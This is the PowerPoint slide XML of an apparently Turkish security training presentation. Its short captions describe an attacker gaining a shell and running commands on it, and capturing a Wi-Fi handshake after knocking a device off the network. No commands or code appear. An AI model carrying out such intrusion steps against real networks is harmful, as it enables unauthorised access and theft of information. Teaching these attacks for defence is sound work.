                  <a:pt x="7626289" y="6186522"/>
                  <a:pt x="7975537" y="6157599"/>
                  <a:pt x="8324021" y="6120393"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8610708" y="6090322"/>
                  <a:pt x="8896668" y="6054773"/>
                  <a:pt x="9181917" y="6013745"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9567644" y="5957937"/>
                  <a:pt x="9951549" y="5891515"/>
                  <a:pt x="10333632" y="5814466"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10795390" y="5720942"/>
                  <a:pt x="11253196" y="5610599"/>
                  <a:pt x="11705652" y="5479871"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11821473" y="5446749"/>
                  <a:pt x="11936790" y="5411956"/>
                  <a:pt x="12051568" y="5375503"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12188952" y="5329668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12188952" y="5386556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12076928" y="5424811"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11897733" y="5481750"/>
                  <a:pt x="11717375" y="5535106"/>
                  <a:pt x="11536062" y="5585626"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11240964" y="5667426"/>
                  <a:pt x="10943702" y="5740182"/>
                  <a:pt x="10644147" y="5805801"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10327134" y="5875371"/>
                  <a:pt x="10008594" y="5936951"/>
                  <a:pt x="9688523" y="5990555"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9422479" y="6035151"/>
                  <a:pt x="9155707" y="6074815"/>
                  <a:pt x="8888222" y="6109562"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8685119" y="6135810"/>
                  <a:pt x="8482017" y="6160529"/>
                  <a:pt x="8278280" y="6180915"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8040138" y="6204234"/>
                  <a:pt x="7801742" y="6226276"/>
                  <a:pt x="7562964" y="6243987"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7252960" y="6266921"/>
                  <a:pt x="6942828" y="6285270"/>
                  <a:pt x="6632187" y="6296737"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6479287" y="6302344"/>
                  <a:pt x="6326388" y="6306294"/>
                  <a:pt x="6173488" y="6311007"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6134854" y="6308868"/>
                  <a:pt x="6096108" y="6310536"/>
                  <a:pt x="6057794" y="6315978"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5751996" y="6315978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5672488" y="6311263"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5434474" y="6298522"/>
                  <a:pt x="5196460" y="6284379"/>
                  <a:pt x="4958318" y="6274057"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4650863" y="6261314"/>
                  <a:pt x="4343789" y="6240293"/>
                  <a:pt x="4037608" y="6210349"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3712313" y="6178622"/>
                  <a:pt x="3387784" y="6143073"/>
                  <a:pt x="3062363" y="6109180"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2724032" y="6074014"/>
                  <a:pt x="2386379" y="6033329"/>
                  <a:pt x="2049401" y="5987115"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1671140" y="5935639"/>
                  <a:pt x="1294034" y="5876390"/>
                  <a:pt x="918071" y="5809370"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="656868" y="5762353"/>
                  <a:pt x="396811" y="5710876"/>
                  <a:pt x="138075" y="5653651"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="5621436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5563063"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284302" y="5628311"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="672667" y="5711258"/>
                  <a:pt x="1063326" y="5781974"/>
                  <a:pt x="1455514" y="5844025"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1739014" y="5888750"/>
                  <a:pt x="2022899" y="5929905"/>
                  <a:pt x="2301302" y="5964052"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2293275" y="5966728"/>
                  <a:pt x="2282320" y="5956407"/>
                  <a:pt x="2268814" y="5953859"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1773838" y="5859481"/>
                  <a:pt x="1283331" y="5745662"/>
                  <a:pt x="797280" y="5612384"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="564618" y="5548676"/>
                  <a:pt x="333400" y="5480444"/>
                  <a:pt x="103626" y="5407689"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="5372617"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1614141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2E79107F-00E7-2B9E-10EA-0D7F51B2BE66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="804" y="150125"/>
            <a:ext cx="12191196" cy="6605517"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Dikdörtgen 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DB3090F-5E97-01FF-20CF-22409A1A27B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2079812" y="1990165"/>
            <a:ext cx="2115670" cy="41237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ABDC39BE-11F0-E1E6-D769-1A2BB0E21A1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6598024" y="824753"/>
            <a:ext cx="3514164" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Bağlantı sağlandı.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Düz Ok Bağlayıcısı 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9D9C787-4C28-616F-99AB-AA5743239E5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4195482" y="1290918"/>
            <a:ext cx="2241177" cy="6992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4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FEDC1C86-F99D-882B-1922-ABBB18E131FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="4066"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Düz Ok Bağlayıcısı 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D15A6CC3-B1A0-B021-6CF0-723925DA45DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4338918" y="519953"/>
            <a:ext cx="17570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Metin kutusu 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFCCECC6-07C8-ECE0-79E0-F09FDC5D8569}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6311153" y="304800"/>
            <a:ext cx="4518212" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Saldırgan aldığı Shell ekranına </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>komutlanırı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> yazarak istediği bilgileri elde edebilir.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Sol Ok 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA53D01D-B240-C21A-DD96-4239AF6449B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5414682" y="1308847"/>
            <a:ext cx="2097742" cy="1075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34093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F254268-E95B-D8C5-BBCC-A1ACA8C90CD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="127313" y="272955"/>
            <a:ext cx="11553478" cy="6441744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Sol Ok 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F2DCB26-B588-0E38-A00E-C47D7E20B868}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2904565" y="466165"/>
            <a:ext cx="2384611" cy="1792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895823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eren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26C8CBC2-EEAD-AF73-A6D5-A5F7ADB6E6F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12194840" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Sol Ok 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADE47181-008D-154B-529B-B35ECA2C4017}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6508376" y="770965"/>
            <a:ext cx="2976283" cy="2151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964323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48CC453C-A128-82DD-9222-E4AE87CAEE69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="4102"/>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436156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ümüş, ekran görüntüsü içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CB1CA6D-AD0A-CDB8-91BA-5AD1E0820784}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="58967" y="450376"/>
            <a:ext cx="12133033" cy="5950424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3105398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39A07634-9600-2EF1-FE88-8E765D050526}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="60380"/>
            <a:ext cx="12192000" cy="6737240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18138083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2A8D761-90E8-EB47-7BBB-A75E1B21A3B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="191069" y="136477"/>
            <a:ext cx="11832609" cy="6550925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3171972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25" descr="Circuit imprimé électronique">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC980FDB-F27E-658F-D471-1B8858D3738F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="3846"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="141514"/>
            <a:ext cx="12191999" cy="6857990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38"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etin kutusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8D9CB1A-67A6-EE0C-7D85-F3F3791D1D04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643469" y="1864478"/>
            <a:ext cx="10905059" cy="265120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spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Beni </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Dinlediğiniz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>İçin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Teşekkür</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ederim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914400">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="5400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="39" name="Straight Connector 33">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B10C9875-9FE7-A93E-AAEE-D1BD6112380E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1122362"/>
            <a:ext cx="6281928" cy="4135437"/>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6200" i="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29099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3175855F-D144-5AEF-1514-D1A18EBF8468}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="19050"/>
            <a:ext cx="4428672" cy="4638010"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Resim 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBBF2ADD-D1E3-EAD0-2925-87B8FDA7F41F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4501243" y="19050"/>
            <a:ext cx="3582955" cy="4638010"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Resim 6" descr="metin içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{782702BB-E8FC-30E8-B0E4-F11DE41239D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8156769" y="-1"/>
            <a:ext cx="4035231" cy="4638009"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Metin kutusu 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8497F29B-2F47-D6D4-00E8-E01B33BB1E5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276447" y="5188688"/>
            <a:ext cx="11674548" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Bir önceki slaytta uyguladığımız işlemler sonucunda ağdan düşen cihaz tekrardan bağlantı kurduğunda elimize </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Handshake</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>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bilgileri düşmüş oluyor. Düşen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Handshake</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> dosyasından </a:t>
            </a:r>
            <a:r>
